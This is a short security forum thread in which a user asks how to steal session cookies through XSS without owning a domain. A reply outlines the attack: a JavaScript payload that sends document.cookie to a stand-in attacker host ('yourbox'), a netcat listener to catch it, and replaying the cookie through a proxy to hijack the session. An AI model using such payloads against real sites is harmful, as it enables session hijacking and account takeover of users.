XSS snatching cookie without domain

Viewing 4 reply threads
  • Author
    Posts
    • #6709
      bigapple
      Participant

      Okay I’m new to this site so I’m hoping me question doesn’t come off as malicious. This is for school, so I’m not trying to do anything evil. Anyways, I was wondering if its possible to snatch a cookie using XSS, and deliver it to an attacker without sending it to an attacker controlled domain. Like if an attacker didn’t own a domain, or if the domain was blocked, is there any other method or trick that can be used to recieve the cookie? I can code in Javascript relatively well, so you can talk about Javascript functions, methods etc. And thats encouraged because I’m interested in the coding perspective so please give me your ideas. Thanks.  ;D

    • #41704
      cd1zz
      Participant

      3 assumptions: 1) the site uses session cookies and 2) there is an xss vulnerability in the application and 3) you can SE someone to open your link or get it to them somehow.

      With that said, yes. You can basically take the cookie from the site using javascript and send it to a listener somewhere else. A simple remote netcat listener would do to capture your stolen cookie. With the data posted to your screen you’d just locate the cookie and copy it. Then, use a proxy to intercept your own web communications to inject your stolen cookie and what ever else you need. Does that answer your question?

    • #41705
      bigapple
      Participant

      I thought Javascript code was limited to client-side browser stuff. Can Javascript even make a TCP connection? If it can, then yes that would answer my question very nicely. But I was thinking more along the lines of something like emailing the contents of the cookie, or some other web-related method of delivering it but that will work well. Thanks.

    • #41706
      cd1zz
      Participant

      You could use something like document.location.replace(“http://yourbox/”+document.cookie+”pagelocation:”+document.location)

      which would connect to “yourbox” where your netcat listener is and send you the cookie with the url query string…..

      MaXe has a nice example here, not the same thing but it might get your wheels turning:  http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/

    • #41707
      bigapple
      Participant

      Okay, thanks. That answers my question nicely  ;D

Viewing 4 reply threads
  • You must be logged in to reply to this topic.

Copyright ©2020 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?